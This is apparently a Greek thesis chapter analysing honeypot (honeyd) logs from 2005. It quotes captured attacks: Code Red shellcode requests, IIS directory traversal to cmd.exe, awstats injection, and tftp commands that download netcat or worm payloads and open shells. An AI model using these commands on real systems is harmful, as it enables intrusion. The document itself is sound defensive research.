Κεφάλαιο 4 αποτελέσματα του πειράματος

Μέγεθος: px
Εμφάνιση ξεκινά από τη σελίδα:

Download "Κεφάλαιο 4 αποτελέσματα του πειράματος"

Transcript

1 ΚΕΦΑΛΑΙΟ 4 ΑΠΟΤΕΛΕΣΜΑΤΑ ΤΟΥ ΠΕΙΡΑΜΑΤΟΣ Εισαγωγή Το honeyd τέθηκε σε λειτουργία στις 24 Ιανουαρίου 2005 και σταμάτησε στις 9 Μαρτίου. Όλο αυτό το διάστημα έτρεχε συνέχεια, με εξαίρεση κάποιες ώρες που αφιερώθηκαν στη συντήρηση του και σε κάποιες διορθώσεις στο configuration file. Η μελέτη των αποτελεσμάτων και τα συμπεράσματα που βγήκαν έγιναν πάνω στα : logs του honeyd -αρχείο messages- και των διάφορων υπηρεσιών των virtual hosts του. Τα logs αυτά παρουσιάζονται παρακάτω. Επειδή δεν υπάρχει κάποιο πρόγραμμα επεξεργασίας των logs του honeyd απο την έκδοση 0.8 και μετά -μέχρι την έκδοση 0.8 λειτουργεί το honeydsum, ένα plug-in όχι ιδιαίτερα χρήσιμο,που δεν βγάζει κάτι περισσότερο απο την επεξεργασία που μπορούμε να κάνουμε οι ίδιοι- η ανάλυση έγινε με χειρωνακτικό τρόπο, αξιοποιώντας τις δυνατότητες των πανίσχυρων εντολών της κονσόλας-grep, awk, cat, sort, uniq και άλλες. logs από το snort το οποίο έτρεχε στο δίκτυο που δανειστήκαμε για το πείραμα και κυρίως απο το ιδιαίτερα εύχρηστο και αποτελεσματικό εργαλείο παρουσίασης των αποτελεσμάτων του snort, το acid. Αυτα τα αποτελέσματα αναλύονται στο κεφάλαιο Ανάλυση των δεδομένων με τα snort, acid. log file που δημιουργεί το πολύ γνωστό network analyzer/sniffer tcpdump, το οποίο έτρεχε στον honeyd host για λίγες μέρες, όταν το πείραμα για την αντιμετώπιση του sasser βρισκόταν σε εξέλιξη. Η επεξεργασία του αρχείου γίνεται σε γραφικό περιβάλλον απο το ethereal. -1-

2 Είναι σημαντικό για κάποιον που παρακολουθεί το πείραμα να κατανοήσει τη φύση των αποτελεσμάτων που παίρνουμε απο το honeyd και απο το snort. Το snort είναι ένα σύστημα ανίχνευσης επιθέσεων για δίκτυα. Δουλεύει με τους κανόνες που διαθέτει και βασίζονται στην ανάλυση της δικτυακής κίνησης, την οποία παρακολουθεί και καταγράφει, ενεργώντας δηλαδή σαν network analyzer/sniffer. Ενώ παρακολουθεί την κίνηση, ψάχνει για συγκεκριμένα strings στην κίνηση τα οποία σύμφωνα με τους κανόνες που διαθέτει, υποδυκνύουν οτι γίνεται κάποια προσπάθεια για εισβολή. Μόλις εντοπίσει τέτοια strings, δρα και ανάλογα, δημιουργώντας έναν συναγερμό -alert- το οποίο και στέλνει μέσω στον administrator που το διαχειρίζεται ή εμφανίζει στην οθόνη, ή αποθηκεύει σε αρχείο. Από την όλη κίνηση που δέχονται τα virtual hosts που δημιούργησε το honeyd, το snort παράγει alerts για όσες επιθέσεις εντοπίσει και ύστερα τα αποθηκεύει σε αρχείο ή στέλνει με . Για επιθέσεις που δεν υπάρχουν προσδιορισμένες ανάμεσα στους κανόνες του snort, δεν είναι ικανό να παράγει alerts. Το honeyd αντίθετα καταγράφει την δικτυακή κίνηση που δέχτηκε, χωρίς να είναι σε θέση να προσδιορίσει οτι πρόκειται για επιθέσεις. Απο την πλευρά μας βέβαια, μιας και το δίκτυο που δημιουργήσαμε δεν έχει παραγωγική αξία, ξέρουμε εκ των προτέρων οτι όλες οι συνδέσεις αποτελούν επιθέσεις. Ουσιαστικά απο τα logs του honeyd θα πάρουμε μια γενική εικόνα για τις επιθέσεις που συμβαίνουν στο δίκτυο μας και θα μπορέσουμε να βγάλουμε κάποια στατιστικά, ενώ απο το snort θα δούμε ποιες συγκεκριμένες επιθέσεις έγιναν και κατάφερε να τις καταγράψει, σε τι συχνότητα εμφανίζονται και θα αναλύσουμε κάποιες από αυτές. ΚΑΠΟΙΕΣ ΓΕΝΙΚΕΣ ΠΑΡΑΤΗΡΗΣΕΙΣ Σε σύγκριση με τα δεδομένα απο το honeynet project [1,2] τους τελευταίους μήνες υπάρχει μια αύξηση στην επιθετική κίνηση που προορίζεται για συστήματα που τρέχουν Microsoft Windows. Η κίνηση αυτή οφείλεται στους ιους/worms sasser, netsky, mydoom, καθώς επίσης και στις πολλές παραλλαγές τους [3]. Τα windows xp honeyd virtual hosts δεχόντουσαν διάφορες φορές την ημέρα επιθέσεις απο τα παραπάνω worms. Συγκεκριμένα το snort κατέγραψε

3 alerts για συνδέσεις που περιείχαν shellcode -άρα πρόκειται για κάποια επίθεσηκαι κατευθύνονταν στις πόρτες 445, 135 και 139 που χρησιμοποιούνται απο τα λειτουργικά της microsoft για file sharing/netbios. Αυτό μεταφράζεται σε περίπου 319 επιθέσεις απο worms τη μέρα! Ένα unpatched windows xp σύστημα χωρίς firewall ενεργοποιημένο, μέσα σε λίγες ώρες σύνδεσης στο διαδίκτυο αναμένεται οτι θα σπάσει, ιδιαίτερα αν βρίσκεται σε δίκτυο με υψηλές ταχύτητες. Οι πόρτες που δέχτηκαν τις περισσότερες συνδέσεις ήταν κατά σειρά οι 445, 135, 80, 149, γεγονός αναμενόμενο, μιας και οι τρεις απο τις 4 πόρτες όπως εξηγείται παραπάνω σχετίζονται με των εξάπλωση των ιως/worms ενώ το web είναι η πιο διάσημη εφαρμογή που χρησιμοποιούν οι χρήστες τους internet. Ένα μεγάλο ποσοστό των μολυσμένων απο ιων hosts που προσπαθούσαν να μεταδώσουν τον ιο στα virtual hosts προέρχεται απο το δίκτυο του Δημόκριτου, το οποίο είναι ένα τυπικό μεγάλο δίκτυο αποτελούμενο απο πολλά και διαφορετικού τύπου υπολογιστικά συστήματα. Σε ένα μεγάλο δίκτυο οι ιοι και τα worms μεταδίδονται πολύ πιο γρήγορα απ'ότι αυτοί που προέρχονται απο το internet. Ένας host που τρέχει το honeyd μπορεί να χρησιμοποιηθεί σε ένα μεγάλο δίκτυο για να εντοπίζει μολύσμένους απο worms υπολογιστές. Το σενάριο αυτό μάλιστα μπορεί να δουλέψει καλύτερα από το snort, γιατί οι περισσότερες συνδέσεις που δέχεται ένα windows honeyd virtual host είναι επιθέσεις απο worms -αφού δεν υπάρχει νόμιμη κίνηση- και υπάρχει πολύ λιγότερη πληροφορία για παρακολούθηση απ'ότι στο snort. Το honeyd σε συνδυασμό με το iptables μπορεί να ρυθμιστούν ώστε να μας ειδοποιούν όταν εμφανίζονται συγκεκριμένα strings κτλ. Αξίζει στο σημείο αυτό να αναφερθεί το σενάριο της λειτουργίας ενός honeyd host σε κάποιο δίκτυο για active defense και προστασία απο ιους. Αν και ακόμα είναι πολύ δύσκολο στην πράξη να υλοποιηθεί ένα τέτοιο σύστημα, σε θεωρητικό επίπεδο μπορεί να περιγραφεί. Το honeyd host αυτό θα είναι τοποθετημένο στο δίκτυο μας και όταν θα επιχειρεί κάποιος υπολογιστής απο το δίκτυο να το μολύνει με κάποιο ιο, αυτό θα κάνει strike back, δηλαδή θα επιτίθεται στον υπολογιστή αυτό, και θα τον καθαρίζει απο τον ιο. Το σενάριο αυτό προυποθέτει οτι το honeyd host θα διαθέτει strike back scripts για όλα τα γνωστά worms που κυκλοφορούν ανά πάσα στιγμή, και θα μπορεί να καταλαβαίνει από ποιο ιο δέχεται επίθεση. Αν αυτό δεν είναι και τόσο εφικτό, τουλάχιστον θα μπορεί να προστατεύει απο συγκεκριμένους ιους, πχ όπως έγινε με τον msblast, ή όπως -3-

4 περιγράφεται σε επόμενο κεφάλαιο για τον ιο sasser. Τα honeyd hosts δυστυχώς δεν δέχτηκαν καμία σύνδεση στην πόρτα 4444 στην οποία είχαμε το script που κάνει strike back για τον msblast. Φαίνεται οτι ο ιος αυτός δεν κυκλοφορεί πια. Αντίθετα, υπήρχαν 38 επιθέσεις από τον ιο code red v2, ο οποίος είναι σε ενεργεία απο το 2001! Συνολικά ip's επιχείρησαν σύνδεση με κάποιο απο τα honeyd hosts! Λαμβάνοντας υπόψιν οτι όλες οι συνδέσεις σε κάποιο honeypot αποτελούν επιθέσεις, καθώς δεν έχει παραγωγική χρήση και άρα δεν υπάρχει νόμιμη κίνηση που να δικαιολογείται, εύκολα φτάνουμε στο συμπέρασμα οτι το internet δεν είναι καθόλου φιλικό περιβάλλον! Υπήρξαν 34 συνδέσεις απο spammers που δοκίμασαν τον open relay mail server για να διαπιστώσουν αν μπορούν να στείλουν το spam τους. Από τους hosts που επιχείρησαν κάποια σύνδεση με τα honeyd hosts το 59% χρησιμοποιεί κάποιο λειτουργικό της Microsoft, το 1.4% Linux, Unix ή κάποιο άλλο λειτουργικό, ενώ το υπόλοιπο 40% δεν προσδιορίζεται. Αυτή η μεγάλη διαφορά οφείλεται πιθανώς στο οτι η συντριπτική πλειοψηφία των συνδέσεων που δέχτηκαν τα honeyd hosts είναι worms που μεταδίδονται απο μολυσμένα windows hosts, ενώ ένα πολύ μικρότερο ποσοστό αποτελούν οι πιο φιλοσοφημένες επιθέσεις, ή οι μη αυτοματοποιημένες επιθέσεις. ΣΥΜΠΕΡΑΣΜΑΤΑ Το honeyd είναι ένα εξαιρετικό εκπαιδευτικό open source εργαλείο. Είναι εύκολο στη λειτουργία του, σταθερό και μπορεί να αποτελέσει μια απλή υποδομή για την ανάλυση και μελέτη των επιθέσεων που συμβαίνουν στο δίκτυο μας. Μια απο τις σημαντικότερες προσφορές του έχει να κάνει με την ευαισθητοποίηση σε θέματα που αφορούν την ασφάλεια δικτύων, καθώς μέσω του honeyd μπορεί κάποιος να ξεκινήσει να μαθαίνει για το πως γίνονται οι δικτυακές επιθέσεις, να μελετήσει τις τεχνικές που χρησιμοποιούνται για το σπάσιμο της ασφάλειας των συστημάτων αλλά και να αυξήσει την συνείδηση για τις αδυναμίες και ευπάθειες των συστημάτων. Επιπλέον η χρήση του για προστασία και καθαρισμό απο worms φαίνεται ιδιαίτερα ελπιδοφόρα για το μέλλον. Τέλος αρκετό ενδιαφέρον παρουσιάζει και η χρήση του για την καταπολέμηση του -4-

5 spam . ΑΝΑΛΥΣΗ ΤΩΝ LOGS Η ανάλυση των logs που δημιούργησε το honeyd δεν θα μπορούσε παρά να ξεκινήσει από το αρχείο messages, που όπως έχει περιγραφεί παραπάνω είναι το βασικό αρχείο στο οποίο καταγράφονται οι συνδέσεις, με την εξής μορφή : :27: tcp(6) xxx.xxx : 48 S [Windows XP SP1] :31: tcp(6) xxx.xxx.96 23: 60 S [Linux 2.6 ] Από τα δεδομένα αυτά μπορούμε να βγάλουμε κάποιες πολύτιμες πληροφορίες, όπως σε ποιές πόρτες γίνονται κυρίως οι επιθέσεις, τι λειτουργικά συστήματα επιχείρησαν σύνδεση στα virtual hosts, ποιός είναι ο αριθμός των ip's. Συνολικός αριθμός συνδέσεων σε κάποια πόρτα markos@amorgos# cat messages wc -l Αυτός ο αριθμός δείχνει το σύνολο των συνδέσεων που έγιναν στα virtual hosts, οποιαδήποτε σύνδεση έγινε σε κάποια απο τις πόρτες τους. Ένα port scan για παράδειγμα, το honeyd θα το καταγράψει σαν σύνδεση στις πόρτες τις οποίες δέχονται το scan. Top attackers markos@amorgos# cat messages awk '{print $4}' sort uniq -c sort -rn > attackers markos@amorgos# cat messages awk '{print $4}' sort uniq -c sort -rn wc -l Συνολικά ip's επιχείρησαν έστω και μια σύνδεση με τα hosts μας. Αν και μόνο οι 88 από αυτούς προέρχονται από το δίκτυο του Δημόκριτου, καταλαμβάνουν τις 42 από τις 50 θέσεις στη λίστα των ip's που πραγματοποίησαν τις περισσότερες συνδέσεις με τα hosts μας! Προφανώς πρόκειται για μολυσμένους από κάποιο ιο υπολογιστές. -5-

6 Top destination ports cat messages awk '{print $7}' sort uniq -c sort -rn > ports Οι πόρτες που δέχτηκαν τις περισσότερες συνδέσεις είναι με την εξής σειρά: (χρήση απο τα microsoft windows για netbios/file sharing) (χρήση απο τα microsoft windows για netbios/file sharing) 3 80 (web) (χρήση απο τα microsoft windows για netbios/file sharing) (windows messenger-το εκμεταλλεύονται διάφορα worms για να στείλουν spam) (windows messenger-το εκμεταλλεύονται διάφορα worms για να στείλουν spam) (χρήση απο το microsoft dcom -διάφορα worms το εκμεταλλεύονται ψάχνοντας για rpc και lsa exploits) (sasser/dabber) (mysql server) (windows universal plug n play service- το χρησιμοποιούν διάφορα worms για να αναγνωρίσουν windows xp συστήματα) (χρήση απο τα microsoft windows για netbios/file sharing) (dabber) Παρατηρούμε οτι η μεγάλη πλειοψηφία των συνδέσεων προορίζεται για τις πόρτες που χρησιμοποιούν τα λειτουργικά της microsoft, επιβεβαιώνοντας έτσι το γεγονός οτι πρόκειται για ιους/worms που προσπαθούν να μολύνουν τα hosts μας. -6-

7 Λίστα με λειτουργικά Το honeyd εκτελώντας passive scanning στους hosts που επιχειρούν σύνδεση προσπαθεί να αναγνωρίσει τι λειτουργικό σύστημα χρησιμοποιούν. Από την ανάλυση του log file προκύπτει οτι το 59.4% χρησιμοποιεί λειτουργικά σύστημα της microsoft, 1.323% linux, 0.2% freebsd ή openbsd, ή solaris, ενώ το ποσοστό των απροσδιόριστων είναι 39.07% λειτουργικά συστήματα windows linux άλλα απροσδιόριστα Ανάλυση του log αρχείου των virtual services Στο αρχείο messages-base καταγράφουν οι διάφορες virtual υπηρεσίες τις συνδέσεις που δεχτήκανε. Οι υπηρεσίες αυτές είναι γραμμένες με κάποιο κοινό πρότυπο, τουλάχιστον όσον αφορά τον τρόπο που καταγράφουν τις συνδέσεις. Ακολουθούν ενδιαφέροντα μέρη από το αρχείο: [1] --MARK--,"Mon Jan 31 10:14:56 EET 2005"apache/HTTP" "143.xxx.xxx ,80, "GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms -excel, application/msword, application/x-shockwave-flash, */* Accept-Language: el Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) -7-

8 Host: Connection: Keep-Alive Πρόκειται για μια σύνδεση απο τον host στον linux host στην πόρτα 80. [2] --MARK--,"Sun Feb 20 08:58:38 EET 2005"apache/HTTP" "143.xxx.xxx ,80, "GET /default.ida?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u68 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u 531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-type: text/xml Content-length: 3379 Ο host επιχείρησε να τρέξει το default.ida exploit στον Πιθανών να πρόκειται για μια απο τις περιπτώσεις επιθέσεων απο το worm code red. Πολλές από τις επιθέσεις καταλαβαίνουμε οτι γίνονται από άτομα πολύ περιορισμένων γνώσεων ή απο αυτοματοποιημένα εργαλεία. Τέτοια εργαλεία λέγονται autorooters και κάνουν scan σε δίκτυα C-class, ή ακόμα και B-class και δοκιμάζουν διάφορα exploits σε όλες τις ip's που απαντούν, καταγράφοντας τα αποτελέσματα σε αρχείο. Τέτοια εργαλεία υπάρχουν διαθέσιμα σε πολλά site στο internet [4] και χρησιμοποιούνται σε μεγάλο βαθμό απο άτομα με χαμηλές γνώσεις και script kiddies. Στο παρακάτω κομμάτι βλέπουμε οτι κάποιος -ή κάποιο πρόγραμμαδοκιμάζει το unicode exploit [5] στον linux virtual host μας που τρέχει προσομείωση apache! Το unicode exploit στοχεύει τον web server της microsoft -internet information server,iis- και για μεγάλο διάστημα από το 2000 που κυκλοφόρησε υπήρξε η αιτία για πολλές εκατοντάδες χιλιάδες παραβιάσεις σε iis servers και δίκτυα. Το bug αυτό μπορεί κανείς να το εκμεταλλευτεί πάρα πολύ εύκολα, για την ακρίβεια -8-

9 χρειάζεται μόνο ένας browser! Αυτό γίνεται ως εξής: Αν εκτελεστεί η παραπάνω εντολή σε κάποιον iis 4.0 ή 5.0 που δεν έχει το patch, αποκτούμε πρόσβαση χρήστη IUSR στον target host. Συνήθως ο επιτιθέμενος θα εκτελέσει τις παρακάτω δυο εντολές ώστε να αποκτήσει shell πρόσβαση στο σύστημα και να μη χρειάζεται να δουλεύει με τον browser: -i +xxx.xxx.xxx.xxx+get+ncx99.exe+c:\winnt\system32\ncx99.exe και Με την πρώτη εντολή ο επιτιθέμενος κατευθύνει το σύστημα να συνδεθεί με μια δικιά του ip -την xxx.xxx.xxx.xxx- με χρήση tftp και να κατεβάσει το αρχείο ncx99.exe. Η εντολή είναι η tftp -i attacker_ip GET ncx99.exe Το tftp είναι μια ελαφριά έκδοση ftp την οποία διαθέτουν όλα τα συστήματα. To αρχείο ncx99.exe είναι το πρόγραμμα netcat, ο ελβετικός σουγιάς των δικτύων όπως συνήθως χαρακτηρίζεται, ελάχιστα τροποποιημένο ώστε να ξεκινάει ένα cmd shell στην πόρτα 99. Αφού κατέβει το netcat στον παραβιασμένο host, με τη δεύτερη εντολή ξεκινάει. Το netcat ανοίγει ένα command prompt shell στην πόρτα 99 και ο επιτιθέμενος έχει τοπική πρόσβαση στο σύστημα. Μεταξύ των ενεργειών που είναι πιθανές να εκτελέσει περιλαμβάνονται η εγκατάσταση sniffer για πιάσιμο κωδικών και άλλων ευαίσθητων πληροφοριών, η εγκατάσταση spyware προγραμμάτων ή keystroke loggers, το ψάξιμο του υπολογιστή και του δικτύου, ενώ μερικοί εισβολείς θα προσπαθήσουν να αλλάξουν την πρώτη σελίδα του site που φιλοξενεί ο iis, μια πράξη που είναι γνωστή με την ονομασία defacement. Επιπλέον μπορεί να χρησιμοποιήσουν τον host αυτό για να κρύψουν τα ίχνη τους συνδεόμενοι σε αρκετούς παραβιασμένους hosts σε διαφορετικές χώρες πρωτού πραγματοποιήσουν μια μεγάλη επίθεση, ή να μετατρέψουν τον host σε ddos client, ή ακόμα σε μηχάνημα αποστολής spam ή -9-

10 αποθήκη για warez υλικό! Βλέπουμε οτι οι κακόβουλες ενέργειες που μπορούν να πραγματοποιηθούν απο κάποιον που θα επιτεθεί σε host που είναι ευάλωτος στο unicode bug είναι ιδιαίτερα επικίνδυνες και καταστροφικές. Να σημειωθεί οτι για το unicode exploit κυκλοφορούν πάρα πολλά εργαλεία που αυτοματοποιούν τη διαδικασία εύρεσης ευάλωτων hosts και κατάληψης τους. [3] --MARK--,"Sun Feb 20 10:47:50 EET 2005"apache/HTTP" "143.xxx.xxx ,80, "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Host: www Connnection: close [5] --MARK--,"Thu Feb 3 04:31:08 EET 2005"apache/HTTP" "143.xxx.xxx ,80, "GET //cgi-bin/awstats/awstats.pl?configdir= %20id%20 HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Host: 143.xxx.xxx.95 Connection: Close Ο επιτιθέμενος εδώ προσπαθεί να εκμεταλλευτεί ένα κενό που υπάρχει στην ασφάλεια του awstat, το οποίο είναι ένας open source log file analyzer που βγάζει προχωρημένα στατιστικά. Μέχρι και την έκδοση 6.4 το awstat είναι ευάλωτο σε αυτό το bug. [5] --MARK--,"Sun Feb 20 11:02:19 EET 2005"apache/HTTP" "143.xxx.xxx ,80, "--MARK--,"Sun Feb 20 11:02:25 EET 2005"apache/HTTP" "143.xxx.xxx ,80, "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1 Host: 143.xxx.xxx

11 Transfer-Encoding: chunked Content-Length: 1499 Ο επιτιθέμενος εδώ προσπαθεί να δει αν ο server μας είναι ευάλωτος στο Microsoft Frontpage server extensions remote debug buffer overrun vulnerability. Σε αυτό το bug ο ευάλωτος microsoft iis με frontpage extensions επιτρέπει την εκτέλεση κώδικα με προνόμια SYSTEM, οπότε καταλαβαίνει κανείς οτι το πρόβλημα είναι ιδιαίτερα σοβαρό. [6] --MARK--,"Sun Feb 20 18:02:43 EET 2005"apache/HTTP" "143.xxx.xxx ,80, "GET /MSADC/root.exe?/c+dir HTTP/1.0 Host: www Connnection: close [7] --MARK--,"Sun Feb 20 10:47:48 EET 2005"apache/HTTP" "143.xxx.xxx ,80, "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 Host: www Connnection: close Τα παραδείγματα 6 και 7 είναι δυο ακόμα scans για γνωστά vulnerabilities του iis. Είτε έχουν εκτελεστεί από αυτοματο πρόγραμμα που ψάχνει για ευάλωτους υπολογιστές είτε από κάποιο worm όπως το nimda που ψάχνει για τα συγκεκριμένα vulnerabilitites προκειμένου να εξαπλωθεί, το αποτέλεσμα θα ήταν το ίδιο αν τρέχαμε microsoft iis χωρίς τα patches και system hardening. [8] --MARK--,"Mon Feb 7 17:48:19 EET 2005"pro-ftpd/FTP" "143.xxx.xxx ,21, "USER anonymous PASS lftp@ PWD -11-

12 PRET LIST PASV LIST Ο host συνδέθηκε με τον virtual ftp server του 143.xxx.xxx.95 και εκτέλεσε τις εντολές pwd, pret list, pasv, list. [9] --MARK--,"Fri Feb 11 20:01:24 EET 2005"MSFTP/FTP" "143.xxx.xxx ,21, "USER anonymous PASS CWD /pub/ MKD p CWD /public/ CWD /pub/incoming/ CWD /incoming/ MKD p RMD p SYST [10] --MARK--,"Fri Feb 11 21:04:26 EET 2005"MSFTP/FTP" "143.xxx.xxx ,21, "USER anonymous PASS CWD /incoming/ DELE /incoming/1mbtest.ptf TYPE I PASV O συνδέθηκε στον 143.xxx.xxx.94 στον ftp server και προσπάθησε να διαπιστωσει αν στον server επιτρέπεται να δημιουργεί φακέλους και να ανεβάζει αρχεία. [11] -12-

13 "--MARK--,"Fri Feb 18 05:27:45 EET 2005"squid/PROXY" "143.xxx.xxx ,8080, "POST HTTP/1.0 CONNECT :25 HTTP/1.0 Content-length: 25 [12] --MARK--,"Sat Feb 19 02:24:19 EET 2005"squid/PROXY" "143.xxx.xxx ,8080, "CONNECT login.icq.com:443 HTTP/1.0 Στις 2 τελευταίες περιπτώσεις έχουμε άτομα που συνδέονται στον proxy server μας και προσπαθούν να διαπιστώσουν αν είναι ανοικτός σε συνδέσεις απο έξω και αν τις προωθεί. Το squid είναι ένα διάσημο open source proxy server για ιστοσελίδες [6]. Όταν ένας υπολογιστής συνδέεται στο διαδίκτυο μέσω κάποιου proxy server σημαίνει οτι δεν κατεβάζει ο ίδιος τις σελίδες, παρά τις κατεβάζει μέσω του proxy server. Στα logs του web server θα φαίνεται η ip του proxy server και όχι του υπολογιστή, αφού ο ίδιος δεν συνδέεται άμμεσα. Ένας proxy server συνήθως χρησιμοποιείται σε κάποιο δίκτυο οπου οι εσωτερικοί hosts δεν θέλουμε να έχουν απευθείας πρόσβαση στο internet και έτσι κατεβάζουν μέσω του proxy τα δεδομένα -πχ ιστοσελίδες. Αυτό γίνεται για λόγους ασφάλειας, ώστε το περιεχόμενο να scan-άρεται για ανεπιθύμητο ή κακόβουλο περιεχόμενο προτού φτάσει στον χρήστη. Επίσης μπορεί να χρησιμοποιείται για καλύτερες ταχύτητες και οικονομία στο bandwidth του δικτύου, μιας και αποθηκεύει το υλικό. Είναι συνηθισμένο φαινόμενο με τους proxy servers στο internet, λόγω κακής ρύθμισης να προωθούν τις συνδέσεις απο μη εξουσιοδοτημένους χρήστες. Έτσι κακόβουλοι χρήστες χρησιμοποιούν proxy servers για να κρύβουν τα ίχνη τους, ώστε να μην είναι εφικτός ο εντοπισμός τους, αλλά και σαν είσοδο στο κατα τα άλλα απροσπέλαστο εσωτερικό δίκτυο. Πολλές επιθέσεις σε high class δίκτυα έχουν πραγματοποιηθεί με τους κακόβουλους χρήστες να εκμεταλλεύονται την κακή ρύθμιση κάποιου proxy server, η οποία τους επέτρεψε να μπουν στο κατα τα άλλα απροσπέλαστο δίκτυο. -13-

14 Στην πρώτη περίπτωση ο συνδέεται στον squid proxy του 143.xxx.xxx.133 και επιχειρεί να διαπιστώσει αν ο 143.xxx.xxx.133 θα συνδεθεί με τον στην πόρτα 25-smtp. Η εντολή αυτή στον proxy είναι η CONNECT :25 HTTP/1.0 Ένας κακορυθμισμένος proxy server θα προωθούσε τη σύνδεση και έτσι ο θα συνδεόταν με την 25 πόρτα του χωρίς να αφήσει ίχνη, αφού τη σύνδεση την κάνει ο 143.xxx.xxx.133. Φυσικά αυτό στην περίπτωση μας δεν θα συμβεί, μιας και δεν τρέχουμε squid proxy στην πραγματικότητα, παρά μια προσομείωση, ώστε να καταφέρουμε να ξεγελάσουμε οποιονδήποτε συνδέεται. Ανάλυση του log αρχείου για τον mydoom Όπως περιγράφεται στο προηγούμενο κεφάλαιο για τη ρύθμιση του honeyd, στις πόρτες 1080, 3127, 3128, ακούει ένα emulator του backdoor που εγκαθιστά το worm mydoom το οποίο log-άρει τα αρχεία που ανεβάζει το worm και καταγράφει τις προσπάθειες σύνδεσης. Πέρα απο τον mydoom, κυκλοφορούν τα worms Doomjuice και Deadhat που εκμεταλλεύονται το παραπάνω backdoor. Η μορφή έχει ως εξής: :55: : mydoom.pl[10567]: connection from :4786 to 143.xxx.xxx.94: :55: : mydoom.pl[10567]: file upload attempt from : :55: : mydoom.pl[10567]: file uploaded to /usr/honeyd/log//65/23/245/85/4786/file.10567, 5120 byte(s) written Κάποιος μολυσμένος απο τον ιο υπολογιστής συνδέεται σε μια απο τις παραπάνω πόρτες και ανεβάζει ένα αρχείο, πιθανόν με τον ιο. cat mydoom grep connection wc -l 177 cat mydoom grep uploaded wc -l 126 Τα virtual hosts δέχτηκαν 177 συνδέσεις απο μολυσμένους απο τον mydoom υπολογιστές, ενώ αποθήκευσαν 126 αρχεία που περιέχουν τον ιο! -14-

15 Ανάλυση του log αρχείου cmdexe Όπως περιγράφεται στο προηγούμενο κεφάλαιο για τη ρύθμιση του honeyd, στις πόρτες 5554, 9996, 20168, 3117 τρέχει το script cmdexe.pl, το οποίο είναι emulator για dos command prompt. Τα αποτελέσματα αποθηκεύονται στο cmdexe, με την μορφή: :57: : cmdexe.pl[310]: connection from :4297 to 143.xxx.xxx.94: :57: : cmdexe.pl[310]: cmd: USER x :57: : cmdexe.pl[310]: cmd: PASS x :57: : cmdexe.pl[311]:connection from :2140 to 143.xxx.xxx.94: :57: : cmdexe.pl[311]:cmd: tftp -i GET h package.exe & package.exe & exit :57: : cmdexe.pl[5187]: connection from :4581 to 143.xxx.xxx.94: :57: : cmdexe.pl[5187]: forced exit of cmdexe.pl (eg, ^C in a connection) Το αρχείο καταγράφει τους hosts που συνδέθηκαν σε αυτές τις πόρτες και τις εντολές που έδωσαν. Στην πρώτη περίπτωση ο υπολογιστής με την ip προσπαθεί να μεταδώσει τον worm dabber, ο οποίος περιγράφεται σε επόμενο κεφάλαιο [7].Ο ιος αυτός εκμεταλλεύεται ένα κενό ασφάλειας στον ιο sasser για να μεταδωθεί και συγκεκριμένα ένα κενό στον ftp server του sasser. Έτσι ο ιος μολύνει μόνο υπολογιστές που έχουν ήδη μολυνθεί απο τον sasser. Αν και υπάρχουν worms που εκμεταλλεύονται το backdoor που πιθανόν αφήνουν άλλα worms, όπως οι Doomjuice και Deadhat που εκμεταλλεύονται το backdoor του Mydoom για να εξαπλωθούν, είναι η πρώτη φορά που κάποιο worm χρησιμοποιεί κάποια τρύπα σε άλλο worm για να μεταδωθεί! Ο Dabber ψάχνει για υπολογιστές με ανοικτή την πόρτα 5554, οποτε και υποθέτει οτι είναι ήδη μολυσμένοι απο τον sasser, που χρησιμοποιεί την πόρτα αυτή για να αφήσει ένα backdoor. Μόλις βρει έναν τέτοιο υπολογιστή εκτελεί κακόβουλο κώδικα προσπαθώντας να σπάσει την ασφάλεια του συστήματος και να ανοίξει ένα command shell στην Έπειτα συνδέεται σε αυτή την πόρτα και εκτελεί την εντολή tftp -i [infecting host ip] GET hello.all package.exe & package.exe & exit -15-

16 Όταν εκτελεστεί η εντολή αυτή, το αρχείο package.exe εκτελείται στον υπολογιστή που μόλις μολύνθηκε. cat cmdexe grep "connection from" wc -l 3067 cat cmdexe grep "tftp -i" wc -l 175 Τα virtual hosts μας δέχτηκαν 3067 συνδέσεις στις πόρτες 5554 και 8967, που πρόκειται για απόπειρες μετάδωσης των sasser και dabber κυρίως, αλλά ενδεχομένως και άλλων worms. Επιπλέον δέχτηκαν 175 σίγουρες επιθέσεις από τον dabber. Οι 13 ip's από το σύνολο που πραγματοποίησαν τις επιθέσεις αυτές ανήκουν στο δίκτυο του Δημόκριτου. Το script που προσομειώνει το command prompt και τρέχει σε όποια πόρτα θέλουμε αποδυκνύεται ιδιαίτερα χρήσιμο, γιατί έχουμε μια άμεση ένδειξη για το ποιοι υπολογιστές απο το δίκτυο μας είναι μολυσμένοι και έτσι μπορούμε να ενημερώσουμε τους διαχειριστές τους για να τους καθαρίσουν. -16-

17 ΣΗΜΕΙΩΣΕΙΣ - ΠΑΡΑΠΟΜΠΕΣ [1] το επίσημο site του project honeynet. [2] το site του ελληνικού honeynet project. [3] LURHQ Threat Intelligence Group, αναλύσεις για τα διάφορα worms, [4] packetstormsecurity.com [5] Microsoft IIS and PWS extended unicode directory traversal vulnerability, [6] [7] Ανάλυση για το worm dabber,

ΚΕΦΑΛΑΙΟ 7 ΠΟΛΕΜΩΝΤΑΣ ΤΟ SPAM

